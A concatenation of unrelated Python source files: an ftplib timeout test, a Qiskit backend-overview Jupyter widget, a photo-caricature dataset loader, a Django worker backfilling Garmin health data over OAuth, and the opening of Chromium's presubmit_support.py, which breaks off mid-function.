self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
backend_overview.py
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""A module for monitoring backends."""
import time
import threading
import types
from IPython.display import display # pylint: disable=import-error
from IPython.core.magic import line_magic, Magics, magics_class # pylint: disable=import-error
from IPython.core import magic_arguments # pylint: disable=import-error
import matplotlib.pyplot as plt # pylint: disable=import-error
import ipywidgets as widgets # pylint: disable=import-error
from qiskit.tools.monitor.backend_overview import get_unique_backends
from qiskit.visualization.gate_map import plot_gate_map
@magics_class
class BackendOverview(Magics):
"""A class of status magic functions.
"""
@line_magic
@magic_arguments.magic_arguments()
@magic_arguments.argument(
'-i',
'--interval',
type=float,
default=60,
help='Interval for status check.'
)
def qiskit_backend_overview(self, line='', cell=None):
"""A Jupyter magic function to monitor backends.
"""
del cell # Unused
args = magic_arguments.parse_argstring(
self.qiskit_backend_overview, line)
unique_hardware_backends = get_unique_backends()
_value = "<h2 style ='color:#ffffff; background-color:#000000;"
_value += "padding-top: 1%; padding-bottom: 1%;padding-left: 1%;"
_value += "margin-top: 0px'>Backend Overview</h2>"
backend_title = widgets.HTML(value=_value,
layout=widgets.Layout(margin='0px 0px 0px 0px'))
build_back_widgets = [backend_widget(b)
for b in unique_hardware_backends]
_backends = []
# Sort backends by operational or not
oper_ord_backends = []
for n, back in enumerate(unique_hardware_backends):
if back.status().operational:
oper_ord_backends = [build_back_widgets[n]] + oper_ord_backends
_backends = [back] + _backends
else:
oper_ord_backends = oper_ord_backends + [build_back_widgets[n]]
_backends = _backends + [back]
qubit_label = widgets.Label(value='Num. Qubits')
qv_label = widgets.Label(value='Quantum Vol.')
pend_label = widgets.Label(value='Pending Jobs',
layout=widgets.Layout(margin='5px 0px 0px 0px'))
least_label = widgets.Label(value='Least Busy',
layout=widgets.Layout(margin='10px 0px 0px 0px'))
oper_label = widgets.Label(
value='Operational', layout=widgets.Layout(margin='5px 0px 0px 0px'))
t12_label = widgets.Label(
value='Avg. T1 / T2', layout=widgets.Layout(margin='10px 0px 0px 0px'))
cx_label = widgets.Label(
value='Avg. CX Err.', layout=widgets.Layout(margin='8px 0px 0px 0px'))
meas_label = widgets.Label(
value='Avg. Meas. Err.', layout=widgets.Layout(margin='8px 0px 0px 0px'))
labels_widget = widgets.VBox([qubit_label, qv_label, pend_label, oper_label,
least_label, t12_label, cx_label, meas_label],
layout=widgets.Layout(margin='295px 0px 0px 0px',
min_width='100px'))
backend_grid = GridBox_with_thread(children=oper_ord_backends,
layout=widgets.Layout(
grid_template_columns='250px ' *
len(unique_hardware_backends),
grid_template_rows='auto',
grid_gap='0px 25px'))
backend_grid._backends = _backends # pylint: disable=attribute-defined-outside-init
backend_grid._update = types.MethodType( # pylint: disable=attribute-defined-outside-init
update_backend_info, backend_grid)
backend_grid._thread = threading.Thread( # pylint: disable=attribute-defined-outside-init
target=backend_grid._update, args=(args.interval,))
backend_grid._thread.start()
back_box = widgets.HBox([labels_widget, backend_grid])
back_monitor = widgets.VBox([backend_title, back_box])
display(back_monitor)
class GridBox_with_thread(widgets.GridBox): # pylint: disable=invalid-name
"""A GridBox that will close an attached thread
"""
def __del__(self):
"""Object disposal"""
if hasattr(self, '_thread'):
try:
self._thread.do_run = False
self._thread.join()
except Exception: # pylint: disable=broad-except
pass
self.close()
def backend_widget(backend):
"""Creates a backend widget.
"""
config = backend.configuration().to_dict()
props = backend.properties().to_dict()
name = widgets.HTML(value="<h4>{name}</h4>".format(name=backend.name()),
layout=widgets.Layout())
num_qubits = config['n_qubits']
qv_val = '-'
if 'quantum_volume' in config.keys():
if config['quantum_volume']:
qv_val = config['quantum_volume']
qubit_count = widgets.HTML(value="<h5><b>{qubits}</b></h5>".format(qubits=num_qubits),
layout=widgets.Layout(justify_content='center'))
qv_value = widgets.HTML(value="<h5>{qubits}</h5>".format(qubits=qv_val),
layout=widgets.Layout(justify_content='center'))
cmap = widgets.Output(layout=widgets.Layout(min_width='250px', max_width='250px',
max_height='250px',
min_height='250px',
justify_content='center',
align_items='center',
margin='0px 0px 0px 0px'))
with cmap:
_cmap_fig = plot_gate_map(backend,
plot_directed=False,
label_qubits=False)
if _cmap_fig is not None:
display(_cmap_fig)
# Prevents plot from showing up twice.
plt.close(_cmap_fig)
pending = generate_jobs_pending_widget()
is_oper = widgets.HTML(value="<h5></h5>",
layout=widgets.Layout(justify_content='center'))
least_busy = widgets.HTML(value="<h5></h5>",
layout=widgets.Layout(justify_content='center'))
t1_units = props['qubits'][0][0]['unit']
avg_t1 = round(sum([q[0]['value'] for q in props['qubits']])/num_qubits, 1)
avg_t2 = round(sum([q[1]['value'] for q in props['qubits']])/num_qubits, 1)
t12_widget = widgets.HTML(value="<h5>{t1} / {t2} {units}</h5>".format(t1=avg_t1,
t2=avg_t2,
units=t1_units),
layout=widgets.Layout())
avg_cx_err = 'NA'
if config['coupling_map']:
sum_cx_err = 0
num_cx = 0
for gate in props['gates']:
if gate['gate'] == 'cx':
for param in gate['parameters']:
if param['name'] == 'gate_error':
# Value == 1.0 means gate effectively off
if param['value'] != 1.0:
sum_cx_err += param['value']
num_cx += 1
avg_cx_err = round(sum_cx_err/(num_cx), 4)
cx_widget = widgets.HTML(value="<h5>{cx_err}</h5>".format(cx_err=avg_cx_err),
layout=widgets.Layout())
avg_meas_err = 0
for qub in props['qubits']:
for item in qub:
if item['name'] == 'readout_error':
avg_meas_err += item['value']
avg_meas_err = round(avg_meas_err/num_qubits, 4)
meas_widget = widgets.HTML(value="<h5>{meas_err}</h5>".format(meas_err=avg_meas_err),
layout=widgets.Layout())
out = widgets.VBox([name, cmap, qubit_count, qv_value, pending, is_oper, least_busy,
t12_widget, cx_widget, meas_widget],
layout=widgets.Layout(display='inline-flex',
flex_flow='column',
align_items='center'))
out._is_alive = True
return out
def update_backend_info(self, interval=60):
"""Updates the monitor info
Called from another thread.
"""
my_thread = threading.currentThread()
current_interval = 0
started = False
all_dead = False
stati = [None]*len(self._backends)
while getattr(my_thread, "do_run", True) and not all_dead:
if current_interval == interval or started is False:
for ind, back in enumerate(self._backends):
_value = self.children[ind].children[2].value
_head = _value.split('<b>')[0]
try:
_status = back.status()
stati[ind] = _status
except Exception: # pylint: disable=broad-except
self.children[ind].children[2].value = _value.replace(
_head, "<h5 style='color:#ff5c49'>")
self.children[ind]._is_alive = False
else:
self.children[ind]._is_alive = True
self.children[ind].children[2].value = _value.replace(
_head, "<h5>")
idx = list(range(len(self._backends)))
pending = [s.pending_jobs for s in stati]
_, least_idx = zip(*sorted(zip(pending, idx)))
# Make sure least pending is operational
for ind in least_idx:
if stati[ind].operational:
least_pending_idx = ind
break
for var in idx:
if var == least_pending_idx:
self.children[var].children[6].value = "<h5 style='color:#34bc6e'>True</h5>"
else:
self.children[var].children[6].value = "<h5 style='color:#dc267f'>False</h5>"
self.children[var].children[4].children[1].max = max(
self.children[var].children[4].children[1].max, pending[var]+10)
self.children[var].children[4].children[1].value = pending[var]
if stati[var].operational:
self.children[var].children[5].value = "<h5 style='color:#34bc6e'>True</h5>"
else:
self.children[var].children[5].value = "<h5 style='color:#dc267f'>False</h5>"
started = True
current_interval = 0
time.sleep(1)
all_dead = not any([wid._is_alive for wid in self.children])
current_interval += 1
def generate_jobs_pending_widget():
"""Generates a jobs_pending progress bar widget.
"""
pbar = widgets.IntProgress(
value=0,
min=0,
max=50,
description='',
orientation='horizontal', layout=widgets.Layout(max_width='180px'))
pbar.style.bar_color = '#71cddd'
pbar_current = widgets.Label(
value=str(pbar.value), layout=widgets.Layout(min_width='auto'))
pbar_max = widgets.Label(
value=str(pbar.max), layout=widgets.Layout(min_width='auto'))
def _on_max_change(change):
pbar_max.value = str(change['new'])
def _on_val_change(change):
pbar_current.value = str(change['new'])
pbar.observe(_on_max_change, names='max')
pbar.observe(_on_val_change, names='value')
jobs_widget = widgets.HBox([pbar_current, pbar, pbar_max],
layout=widgets.Layout(max_width='250px',
min_width='250px',
justify_content='center'))
return jobs_widget
|
dataset.py
|
"""Data fetching
"""
# MIT License
#
# Copyright (c) 2019 Yichun Shi
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import os
import time
import math
import random
import shutil
from multiprocessing import Process, Queue
import h5py
import numpy as np
is_photo = lambda x: os.path.basename(x).startswith('P')
class DataClass(object):
def __init__(self, class_name, indices, label):
self.class_name = class_name
self.indices = np.array(indices)
self.label = label
return
def random_pc_pair(self):
photo_idx = np.random.permutation(self.photo_indices)[0]
caric_idx = np.random.permutation(self.caric_indices)[0]
return np.array([photo_idx, caric_idx])
class Dataset():
def __init__(self, path=None, prefix=None):
self.DataClass = DataClass
self.num_classes = None
self.classes = None
self.images = None
self.labels = None
self.is_photo = None
self.idx2cls = None
self.batch_queue = None
self.batch_workers = None
if path is not None:
self.init_from_list(path, prefix)
def init_from_list(self, filename, prefix=None):
with open(filename, 'r') as f:
lines = f.readlines()
lines = [line.strip().split(' ') for line in lines]
assert len(lines)>0, \
'List file must be in format: "fullpath(str) label(int)"'
images = [line[0] for line in lines]
if prefix is not None:
print('Adding prefix: {}'.format(prefix))
images = [os.path.join(prefix, img) for img in images]
if len(lines[0]) > 1:
labels = [int(line[1]) for line in lines]
else:
labels = [os.path.dirname(img) for img in images]
_, labels = np.unique(labels, return_inverse=True)
self.images = np.array(images, dtype=np.object)
self.labels = np.array(labels, dtype=np.int32)
self.init_classes()
print('%d images of %d classes loaded' % (len(self.images), self.num_classes))
self.separate_photo_caricature()
def separate_photo_caricature(self):
self.is_photo = [is_photo(im) for im in self.images]
self.is_photo = np.array(self.is_photo, dtype=np.bool)
for c in self.classes:
c.photo_indices = c.indices[self.is_photo[c.indices]]
c.caric_indices = c.indices[~self.is_photo[c.indices]]
print('{} photos {} caricatures'.format(self.is_photo.sum(), (~self.is_photo).sum()))
return
def init_classes(self):
dict_classes = {}
classes = []
self.idx2cls = np.ndarray((len(self.labels),)).astype(np.object)
for i, label in enumerate(self.labels):
if not label in dict_classes:
dict_classes[label] = [i]
else:
dict_classes[label].append(i)
for label, indices in dict_classes.items():
classes.append(self.DataClass(str(label), indices, label))
self.idx2cls[indices] = classes[-1]
self.classes = np.array(classes, dtype=np.object)
self.num_classes = len(classes)
def build_subset_from_indices(self, indices, new_labels=True):
subset = type(self)()
subset.images = self.images[indices]
subset.labels = self.labels[indices]
if new_labels:
_, subset.labels = np.unique(subset.labels, return_inverse=True)
subset.init_classes()
print('built subset: %d images of %d classes' % (len(subset.images), subset.num_classes))
return subset
# Data Loading
def get_batch(self, batch_size):
''' Get random pairs of photos and caricatures. '''
indices_batch = []
# Random photo-caricature pair
assert batch_size%2 == 0
classes = np.random.permutation(self.classes)[:batch_size//2]
indices_batch = np.concatenate([c.random_pc_pair() for c in classes], axis=0)
batch = {}
if len(indices_batch) > 0:
batch['images'] = self.images[indices_batch]
batch['labels'] = self.labels[indices_batch]
if self.is_photo is not None:
batch['is_photo'] = self.is_photo[indices_batch]
return batch
# Multithreading preprocessing images
def start_batch_queue(self, batch_size, proc_func=None, maxsize=1, num_threads=3):
self.batch_queue = Queue(maxsize=maxsize)
def batch_queue_worker(seed):
np.random.seed(seed)
while True:
batch = self.get_batch(batch_size)
if proc_func is not None:
batch['image_paths'] = batch['images']
batch['images'] = proc_func(batch['image_paths'])
self.batch_queue.put(batch)
self.batch_workers = []
for i in range(num_threads):
worker = Process(target=batch_queue_worker, args=(i,))
worker.daemon = True
worker.start()
self.batch_workers.append(worker)
def pop_batch_queue(self, timeout=60):
return self.batch_queue.get(block=True, timeout=timeout)
def release_queue(self):
if self.batch_queue is not None:
self.batch_queue.close()
if self.batch_workers is not None:
for w in self.batch_workers:
w.terminate()
del w
self.batch_workers = None
|
worker.py
|
import json
import logging
import signal
import sys
import time
import traceback
from datetime import datetime, timedelta
from threading import Lock, Thread
import pytz
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from requests_oauthlib import OAuth1Session
from oh_template.settings import NUM_OF_SUMMARY_UPLOAD_THREADS
from .consts import BACKFILL_SECONDS, BACKFILL_MIN_YEAR, GARMIN_BACKFILL_URLS, BACKFILL_SLEEP_BETWEEN_CALLS
from .helpers import unix_time_seconds, merge_with_existing_and_upload, get_oh_user_from_garmin_id, group_summaries_per_user_and_per_month, extract_summaries, remove_fields, summaries_to_process_key, \
remove_unwanted_fields, extract_timestamp
from .models import GarminMember, SummariesToProcess, RetrievedData
utc = pytz.UTC
_LOGGER = logging.getLogger(__name__)
handle_summaries_lock = Lock()
locked_summaries = []
process_terminated = False
def terminate_process(signum, frame):
global process_terminated
process_terminated = True
def start_worker_threads():
signal.signal(signal.SIGINT, terminate_process)
signal.signal(signal.SIGTERM, terminate_process)
backfill_thread = Thread(target=handle_backfill)
backfill_thread.start()
for i in range(NUM_OF_SUMMARY_UPLOAD_THREADS):
thread = Thread(target=handle_summaries)
thread.start()
def handle_backfill():
while not process_terminated:
try:
garmin_member = GarminMember.objects.get(was_backfilled=False, userid__isnull=False, has_health_export_permission=True)
handle_backfill_for_member(garmin_member)
except ObjectDoesNotExist:
# Nothing to do
time.sleep(0.5)
def handle_backfill_for_member(garmin_member):
oauth = OAuth1Session(
client_key=settings.GARMIN_KEY,
client_secret=settings.GARMIN_SECRET,
resource_owner_key=garmin_member.access_token,
resource_owner_secret=garmin_member.access_token_secret
)
end_date = datetime.utcnow()
start_date = end_date - timedelta(seconds=BACKFILL_SECONDS)
_LOGGER.info(f"Executing backfill for user {get_oh_user_from_garmin_id(garmin_member.userid)}")
while start_date.year >= BACKFILL_MIN_YEAR:
start_epoch = unix_time_seconds(start_date)
end_epoch = unix_time_seconds(end_date)
for url in GARMIN_BACKFILL_URLS:
if process_terminated:
return # Terminate this thread
summary_url = f"{url}?summaryStartTimeInSeconds={start_epoch}&summaryEndTimeInSeconds={end_epoch}"
res = oauth.get(url=summary_url)
if res.status_code != 202:
_LOGGER.error(f"Invalid response for backfill url {summary_url}, got response response: {res.content},{res.status_code}")
# Failed to call all backfill's !!
if res.status_code == 403:
# Something is wrong with the user authorisation token. He might have removed the authorization...
garmin_member.has_health_export_permission = False
garmin_member.save()
# We'll stop executing them for this user, in the next run of the handle_backfill thread,
# this function will be called again for this user (if it's authorized), since was_backfilled is still False
return
else:
_LOGGER.info(f"Called backfill {summary_url}")
time.sleep(BACKFILL_SLEEP_BETWEEN_CALLS)
end_date = start_date
start_date = start_date - timedelta(seconds=BACKFILL_SECONDS)
garmin_member.was_backfilled = True
garmin_member.save()
_LOGGER.info(f"Backfill finished for user {get_oh_user_from_garmin_id(garmin_member.userid)}")
def handle_summaries():
while not process_terminated:
not_locked_summaries = None
with handle_summaries_lock:
for summaries_to_process in SummariesToProcess.objects.all():
if summaries_to_process_key(summaries_to_process) not in locked_summaries:
not_locked_summaries = summaries_to_process
break
if not_locked_summaries is not None:
key = summaries_to_process_key(not_locked_summaries)
locked_summaries.append(key)
if not_locked_summaries is not None:
try:
process_summaries_for_user_and_file(not_locked_summaries.file_name, not_locked_summaries.garmin_user_id)
finally:
locked_summaries.remove(summaries_to_process_key(not_locked_summaries))
else:
# Nothing to do
time.sleep(0.5)
def update_retrieved_data_log(oh_user, summaries, file_name):
if len(summaries) == 0:
return # Nothing to do
data_type = "-".join(file_name.split("-")[:-2])
min_timestamp = min(map(lambda summary: extract_timestamp(summary).timestamp(), summaries))
max_timestamp = max(map(lambda summary: extract_timestamp(summary).timestamp(), summaries))
min_date = utc.localize(datetime.fromtimestamp(min_timestamp))
max_date = utc.localize(datetime.fromtimestamp(max_timestamp))
with handle_summaries_lock:
try:
retrieved_data = RetrievedData.objects.get(member=oh_user, data_type=data_type)
retrieved_data.min_date = min_date if min_date < retrieved_data.min_date else retrieved_data.min_date
retrieved_data.max_date = max_date if max_date > retrieved_data.max_date else retrieved_data.max_date
except ObjectDoesNotExist:
retrieved_data = RetrievedData(member=oh_user, data_type=data_type, min_date=min_date, max_date=max_date)
retrieved_data.save()
def process_summaries_for_user_and_file(file_name, garmin_user_id):
summaries_to_process_all = SummariesToProcess.objects.filter(garmin_user_id__exact=garmin_user_id, file_name__exact=file_name)
summaries = []
ids_to_delete = []
for summaries_to_process in summaries_to_process_all:
ids_to_delete.append(summaries_to_process.id)
summaries += json.loads(summaries_to_process.summaries_json)
try:
oh_user = get_oh_user_from_garmin_id(garmin_user_id)
all_summaries = merge_with_existing_and_upload(oh_user, summaries, file_name)
update_retrieved_data_log(oh_user, all_summaries, file_name)
SummariesToProcess.objects.filter(id__in=ids_to_delete).delete()
_LOGGER.info(f"Saved {len(all_summaries)} summaries for garmin_user_id={garmin_user_id}, file_name={file_name}")
except:
e = sys.exc_info()[0]
_LOGGER.error(f"Failed to handle summaries JSON {file_name} {e}")
traceback.print_exc()
# Reschedule handling
save_summaries_for_delayed_processing(file_name, garmin_user_id, summaries)
def handle_summaries_delayed(body, summaries_name, data_type, fields_to_remove=None):
body = body.decode('utf-8')
summaries = extract_summaries(body, summaries_name)
if fields_to_remove is not None:
remove_fields(summaries, fields_to_remove)
grouped_summaries = group_summaries_per_user_and_per_month(summaries)
for garmin_user_id, monthly_summaries in grouped_summaries.items():
for year_month, summaries in monthly_summaries.items():
file_name = f"{data_type}-{year_month}"
remove_unwanted_fields(summaries)
save_summaries_for_delayed_processing(file_name, garmin_user_id, summaries)
def save_summaries_for_delayed_processing(file_name, garmin_user_id, summaries):
_LOGGER.info(f"Saving {len(summaries)} summaries {file_name} for user {garmin_user_id} for further processing")
summaries_to_process = SummariesToProcess()
summaries_to_process.summaries_json = json.dumps(summaries)
summaries_to_process.garmin_user_id = garmin_user_id
summaries_to_process.file_name = file_name
summaries_to_process.save()
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '2.0.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import argparse
import ast # Exposed through the API.
import contextlib
import cpplint
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import multiprocessing
import os # Somewhat exposed through the API.
import random
import re # Exposed through the API.
import signal
import six
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback
import unittest # Exposed through the API.
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners as owners_db
import owners_client
import owners_finder
import presubmit_canned_checks
import rdb_wrapper
import scm
import subprocess2 as subprocess # Exposed through the API.
if sys.version_info.major == 2:
# TODO(1009814): Expose urllib2 only through urllib_request and urllib_error
import urllib2 # Exposed through the API.
import urlparse
import urllib2 as urllib_request
import urllib2 as urllib_error
else:
import urllib.parse as urlparse
import urllib.request as urllib_request
import urllib.error as urllib_error
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
def time_time():
# Use this so that it can be mocked in tests without interfering with python
# system machinery.
return time.time()
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate().
class SigintHandler(object):
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
self.__previous_signal = signal.signal(signal.SIGINT, self.interrupt)
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self, signal_num, frame):
with self.__lock:
self.__on_sigint()
self.__previous_signal(signal_num, frame)
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
return stdout, stderr
sigint_handler = SigintHandler()
class Timer(object):
def __init__(self, timeout, fn):
self.completed = False
self._fn = fn
self._timer = threading.Timer(timeout, self._onTimer) if timeout else None
def __enter__(self):
if self._timer:
self._timer.start()
return self
def __exit__(self, _type, _value, _traceback):
if self._timer:
self._timer.cancel()
def _onTimer(self):
self._fn()
self.completed = True
class ThreadPool(object):
def __init__(self, pool_size=None, timeout=None):
self.timeout = timeout
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def _GetCommand(self, test):
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
# On Windows, scripts on the current directory take precedence over PATH, so
# that when testing depot_tools on Windows, calling `vpython.bat` will
# execute the copy of vpython of the depot_tools under test instead of the
# one in the bot.
# As a workaround, we run the tests from the parent directory instead.
if (cmd[0] == vpython and
'cwd' in test.kwargs and
os.path.basename(test.kwargs['cwd']) == 'depot_tools'):
test.kwargs['cwd'] = os.path.dirname(test.kwargs['cwd'])
cmd[1] = os.path.join('depot_tools', cmd[1])
return cmd
def _RunWithTimeout(self, cmd, stdin, kwargs):
p = subprocess.Popen(cmd, **kwargs)
with Timer(self.timeout, p.terminate) as timer:
stdout, _ = sigint_handler.wait(p, stdin)
if timer.completed:
stdout = 'Process timed out after %ss\n%s' % (self.timeout, stdout)
return p.returncode, stdout
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of 'python'
to vpython invocations.
"""
cmd = self._GetCommand(test)
try:
start = time_time()
returncode, stdout = self._RunWithTimeout(cmd, test.stdin, test.kwargs)
duration = time_time() - start
except Exception:
duration = time_time() - start
return test.message(
'%s\n%s exec failure (%4.2fs)\n%s' % (
test.name, ' '.join(cmd), duration, traceback.format_exc()))
if returncode != 0:
return test.message(
'%s\n%s (%4.2fs) failed\n%s' % (
test.name, ' '.join(cmd), duration, stdout))
if test.info:
return test.info('%s\n%s (%4.2fs)' % (test.name, ' '.join(cmd), duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
def prompt_should_continue(prompt_string):
sys.stdout.write(prompt_string)
sys.stdout.flush()
response = sys.stdin.readline().strip().lower()
return response in ('y', 'yes')
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self):
sys.stdout.write(self._message)
sys.stdout.write('\n')
for index, item in enumerate(self._items):
sys.stdout.write(' ')
# Write separately in case it's unicode.
sys.stdout.write(str(item))
if index < len(self._items) - 1:
sys.stdout.write(' \\')
sys.stdout.write('\n')
if self._long_text:
sys.stdout.write('\n***************\n')
# Write separately in case it's unicode.
sys.stdout.write(self._long_text)
sys.stdout.write('\n***************\n')
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, url=None, project=None, branch=None):
self.host = urlparse.urlparse(url).netloc if url else None
self.project = project
self.branch = branch
self.cache = {}
self.code_owners_enabled = None
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, API isn't very clear what's inside, so see tests for example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].items():
if str(rev_info['_number']) == str(patchset):
break
else:
